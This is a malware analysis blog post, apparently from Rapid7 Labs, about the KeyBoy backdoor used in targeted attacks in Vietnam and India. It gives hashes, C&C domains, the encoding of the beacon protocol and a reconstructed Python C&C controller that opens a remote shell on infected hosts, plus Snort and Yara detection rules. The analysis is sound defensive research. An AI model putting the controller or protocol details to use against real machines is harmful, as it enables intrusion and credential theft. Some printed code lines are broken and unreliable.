In our never-ending quest to spot and expose the nastiest of the Internet, me and Mark this time incidentally stepped into a targeted attacks campaign apparently directed at a distributed and diversified base of victims. In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience (and to our knowledge, for a lack of an existing name) we call KeyBoy, due to a string present in one of the samples.


We'll describe how the attackers operate these backdoors, provide some scripts useful to further investigate the campaign as well as meanings to detect infections or scout for additional samples.


Exploits and Payloads

We encountered the first document exploit called "THAM luan- GD- NCKH2.doc" a few days ago, which appears to be leveraging some vulnerabilities patched with MS12-060. When opened with a vulnerable version of Microsoft Word, the exploit will initiate the infection routine and display the legitimate document that follows:


This document, written in Vietnamese, appears to be reviewing and discussing best practices for teaching and researching scientific topics. We have no knowledge on the identity of the target, but we can assume he might part of the Vietnamese academic community. The document is named to Nguyen Anh Tuan, which is presented as author of this crafted text.


Following are the hashes of the exploit file:


THAM luan- GD- NCKH2.doc



SHA51230bb6c3bcb797b8ebe5ab4bef59173ba358ea6713ea26cbc0147c37b99a54eca62f09475299a44c3 98679f84fa87dc6dff084a185543945f123fb34236fa825b


When executed the exploit initially creates and launches a dropper at location %Temp%\svchost.exe with the following hashes:



SHA5126a73333ca96ce0db7fa62eec34987070b823d95618e9c5e36ac0486927270794790d957ebc40c513 23941ed22acded5ecfa3e9acd88f2c66a6619fa6793231ea


This payload then creates a DLL file in system32 called CREDRIVER.dll, which is in fact the actual backdoor:



SHA5125907c682e1cce4ce2aae3a165abefd40e7de4c4befefe895204ee59f9efd11ef75f894cd535597fe 698de80f6ee4e361234c96a0454c490b4faa69869191ed81


We also identified another document exploiting CVE-2012-0158, but this time apparently targeting some Indian individuals. The content of the document is the following:


This time the bait appears to be related to the state of telecommunication infrastructure in the district of Calcutta in India, discussing the coverage of GSM networks and availability and stability of broadband connections.
Also for this intrusion we can't know the identity of the target, but our hypothesis is either someone in the telecommunications industry or a representative of the local government. In this case this crafted document pretends to be authored by someone called Amir Kumar Gupta.



SHA5126568f1f054c56716506ea2acdfb60919cc55f3da4ef05dee88925b6ccb835ad471e7d0d3e61befca 8b7d320c08ee7ba96322c127329c6f94bfb288eeb9c6a0c5



SHA5120b064bad3a237734cf74f587a573a79949c79f8922df444ac7d73474d5cab739b495036624a3b907 b18acb276ac5f8c777d4565bbba8e615212a2aedbc54f95e


All backdoors appear to be compiled on April 1st 2013, suggesting that the attacks are reasonably recent.



Analysis of the Backdoor

For the sake of this analysis we'll take the Vietnamese backdoor as an example; the one found in the Indian attack operates in the exact same way.

As mentioned, when the exploit is opened a dropper is created and launched, which then takes care of creating a Windows service called MdAdum, which is then visible in the registry as follows:


The dropper then launches the service with the DLL located at C:\WINDOWS\system32\CREDRIVER.dll and deletes itself. Resilience on the system is guaranteed by the use of such service which will be executed at every start up.

Note that the Indian attack does not make use of this middle-stage dropper, but directly installs and launches the Windows service instead.


This backdoor has several features including:

  1. Steal credentials from Internet Explorer
  2. Steal credentials from Mozilla Firefox
  3. Install a keylogger for intercepting credentials on Google Chrome
  4. Operate in an interactive mode to allow the attacker to perform additional investigation on the compromised system and exfiltrate data.


Following you can see the portion of the code where the backdoor, after having verified which version of Mozilla Firefox is installed on the system, decides which technique to use to recover the credentials from the browser's local storage.


In older versions of Firefox, credentials were stored in several .txt files in %AppData%\Mozilla\Firefox, while in most recent ones they are stored in a SQLite database. In the following snipped you see the SQL statement to extract the data:


Just in the same way, the backdoor attempts to collect password autocomplete  from Internet Explorer:


The backdoor also creates a separate thread that installs a Windows hook procedure on message WH_KEYBOARD_LL, through which it can intercept keystrokes. We believe this is mainly used to intercept credentials from other browsers, specifically Google Chrome:



Analysis of the Protocol

The backdoor tries to contact the following domains until it gets a response from an active one:



The Indian backdoor tries to contact the following domains instead:



In the first set of domains they are either registered with Whois proxy services or with fake identities. In the second set they are making use of a dynamic DNS service by

Following are traces collected from passive DNS data relevant to the hosts involved in these attacks:


DomainFirst SeenLast SeenIPsASN
silence.phdns01.comMay 21st 2013May 25th 2013199.193.66.51 (TTL: 1800)6939 - HURRICANE - Hurricane Electric, Inc.
cpnet.phmail.usMay 10th 2013May 24th 2013199.193.66.51 (TTL: 1800)6939 - HURRICANE - Hurricane Electric, Inc.
imlang.phmail.orgMay 22nd 2013May 23rd 2013199.193.66.51 (TTL: 1800)6939 - HURRICANE - Hurricane Electric, Inc.
vtt.phdns01.comMarch 9th 2013April 19th 2013199.193.66.51 (TTL: 1800)6939 - HURRICANE - Hurricane Electric, Inc.
preter.epac.toMay 31st 2013May 31st 20131.235.10.28 (TTL: 30)9318 - HANARO-AS Hanaro Telecom Inc.
preter.epac.toMay 18th 2013May 28th 2013113.160.44.154 (TTL: 30)45899 - VNPT-AS-VN VNPT Corp


This is an initial request that the backdoor would send out on port 443 to an active C&C:


00000000  c4 4c 87 3f 11 1e c4 1a  2c a9 12 1a 19 61 82 de  |.L.?....,....a..|

00000010  19 26 f8 de bd 26 de 19  b0 19 1a 95 a1 dd 2b 6d  |.&...&........+m|

00000020  c2 1a 82 b0 19 eb 47 b0  26 47 b0 26 20 82 eb ca  |......G.&G.& ...|

00000030  bd 26 ca 82 54 1a d0 c2  87 38 a1 20 82 b0 19 eb  |.&..T....8. ....|

00000040  b0 54 b0 19 1a 00                                 |.T....|


At the time of the analysis all the C&C servers were not responding, we started reverse engineering the communication protocol and noticed that it simply used a multiply with 0x69 to encode the traffic sent to the controllers. You can easily decode the content of the payload with the following Python snippet:


def decode(x):
    return ''.join([chr((ord(i)*0xd9)&0xff) for i in x])


The previous packet decodes to the following:





2013/06/06 23:56:24

Proxy 20130401


While reverse engineering the backdoor we noticed that the malware expects the following messages from the C&C server it contacts:

  • Sysinfo
  • FileManager
  • Download
  • UploadFileOk
  • Shell


Intrigued by its capabilities, we started reconstructing the communication protocol and practically building a tool that would operate just like the original controller used by the attackers. The following is a preliminary Python script that implements the protocol used by the malware and allows you to interact with it:

#!/usr/bin/env python
# Rapid7 Labs
# 2013-06-06
# (c) 2013 Rapid7

import sys
import socket
import select

def decode(x):
    return ''.join([chr((ord(i)*0xd9)&0xff) for i in x])

def encode(x):
    return ''.join([chr((ord(i)*0x93)&0xff) for i in x])

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", 443))

    print "[*] C&C Running on"

    while True:
        s2, ca = s.accept()
        print "[+] New client connected:", ca

        while True:
            dec = ""
            rlist, wlist, xlist =[s2,],[],[], 10)
            while rlist:
                data = s2.recv(2048)
                if not data: break

                dec = decode(data)
                print dec
                rlist, wlist, xlist =[s2,],[],[], 2)

            if dec.startswith("$login$"):
                print "[+] Authenticating on the bot"
                s2.send(encode("login_OK")+ "\x00")
                s2.send(encode("Refresh")+ "\x00")
            elif dec.startswith("OnLine"):
                s2.send(encode("test")+ "\x00") # Replace "test" with "" in case of the Indian sample.
                cmd = raw_input("shell> ").strip()


    return 0

if __name__ == "__main__":
    try: sys.exit(main())
    except KeyboardInterrupt: pass


We then launched this script and redirected the traffic coming from a system infected with KeyBoy and took control of it .

Here you can see the bot beaconing in and requiring for authentication (funny enough the password is "test", while the Indian sample uses ""):


[*] C&C Running on

[+] New client connected: ('', 1443)




2013/06/07 02:18:35

Proxy 20130401

[+] Authenticating on the bot




When the authentication is confirmed, we are prompted with a shell through which we can interact in real-time with the bot. The messages we previously identified represent the actual commands that can be sent to the bot:

  • Sysinfo: returns detailed information on the computer (pretty much the output of systeminfo); the bot will respond with a message with the header $sysinfo$.
  • FileManager: interact with all the disks available on the victim system; the bot will respond with a message with the header $fileManager$.
  • Download: download a file from the compromised system; the bot will respond with a message with the header $fileDownload$.
  • UploadFileOk: upload a file to the compromised system; the bot will respond with a message with the header $fileUpload$.


Most interestingly the command Shell spawns a Windows command shell that we can control remotely:


shell> Shell


Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.




shell> tasklist





Image Name                   PID Session Name     Session#    Mem Usage

========================= ====== ================ ======== ============

System Idle Process            0 Console                 0         28 K

System                         4 Console                 0        236 K

smss.exe                     368 Console                 0        388 K

csrss.exe                    584 Console                 0      3,740 K

winlogon.exe                 608 Console                 0      4,312 K

services.exe                 652 Console                 0      3,368 K

lsass.exe                    664 Console                 0      6,152 K

VBoxService.exe              820 Console                 0      3,092 K

svchost.exe                  864 Console                 0      4,696 K

svchost.exe                  952 Console                 0      4,252 K

svchost.exe                 1044 Console                 0     20,424 K

svchost.exe                 1100 Console                 0      3,584 K

svchost.exe                 1160 Console                 0      4,268 K

spoolsv.exe                 1428 Console                 0      4,996 K

explorer.exe                1656 Console                 0     29,944 K

VBoxTray.exe                1820 Console                 0      3,620 K

GrooveMonitor.exe           1868 Console                 0      4,340 K

ctfmon.exe                  1888 Console                 0      3,148 K

jqs.exe                     2040 Console                 0      1,396 K

vmware-usbarbitrator.exe     248 Console                 0      3,180 K

alg.exe                     1380 Console                 0      3,440 K

wscntfy.exe                 1692 Console                 0      1,804 K

wuauclt.exe                 1116 Console                 0      6,568 K

svchost.exe                  796 Console                 0      4,088 K

cmd.exe                      480 Console                 0      2,624 K

tasklist.exe                 724 Console                 0      4,068 K

wmiprvse.exe                1256 Console                 0      5,544 K




While the interaction with the bots could also be scripted, it might be plausible that the operators of these intrusions might be interacting with their targets exclusively manually to collect different data depending on each individual they infected and the goals they had set for the attack.



Detecting Infections

While these are clearly not widespread attacks and, as in any other targeted attack case, we should not create alarmism for threats that are likely irrelevant for the majority of organizations, we want to share a few indicators that might help identify infections or assist in further research by whoever is interested in this campaign.


Firstly, thanks to the fixed patterns used by the malware in the authentication procedure, we can detect outbound traffic from infected hosts with the following simple Snort rule:


alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"KeyBoy Backdoor Login"; flow:to_server; content:"|c4 4c 87 3f 11 1e c4 1a|"; depth:8; sid:1000001; rev:1; classtype:trojan-activity; reference:url, geted-attacks-against-vietnam-and-india)


The simplest way to identify an infection on a given Windows system, is just to look for the existence of the file C:\WINDOWS\system32\CREDRIVER.dll or of a service called MdAdum.


We also created a couple of Yara rules that you can use to scan your systems your collection of malware samples to identify copies of KeyBoy:


rule KeyBoy_Dropper
        author = "Rapid7 Labs"
        reference = ""

        $1 = "I am Admin"
        $2 = "I am User"
        $3 = "Run install success!"
        $4 = "Service install success!"
        $5 = "Something Error!"
        $6 = "Not Configed, Exiting"

        all of them

rule KeyBoy_Backdoor
        author = "Rapid7 Labs"
        reference = ""

        $1 = "$login$"
        $2 = "$sysinfo$"
        $3 = "$shell$"
        $4 = "$fileManager$"
        $5 = "$fileDownload$"
        $6 = "$fileUpload$"

        all of them




Not a day passes by without hearing of someone hit by a targeted attack. Recently the growth of amount and scale of targeted attacks has come to the point were they are starting to look more like opportunistic carpet bombings rather than ninja strikes. It's common to observe attacks pulled off successfully without any particular sophistication in place, including the incidents described in this post.


It's also getting quite difficult to attribute the attacks to any state-sponsored unit, both because there's a generic lack of strong evidence in such incidents (which is why we refrained from making any statement on the origin of these intrusions) but frankly also because almost anybody could operate such campaigns and be reasonably successful. The only differentiation between actors at this point exclusively relies on identifying the motivations and the context.


Beware though, just because these attacks are conceptually targeted, it doesn't necessarily mean that they should have a higher priority than any other threat on your security program. Our suggestion remains the same: identify your core assets, recognize the most impactful threats to such assets and inform and protect yourself accordingly.


This research was brought to you by Claudio Guarnieri and Mark Schloesser from Rapid7 Labs.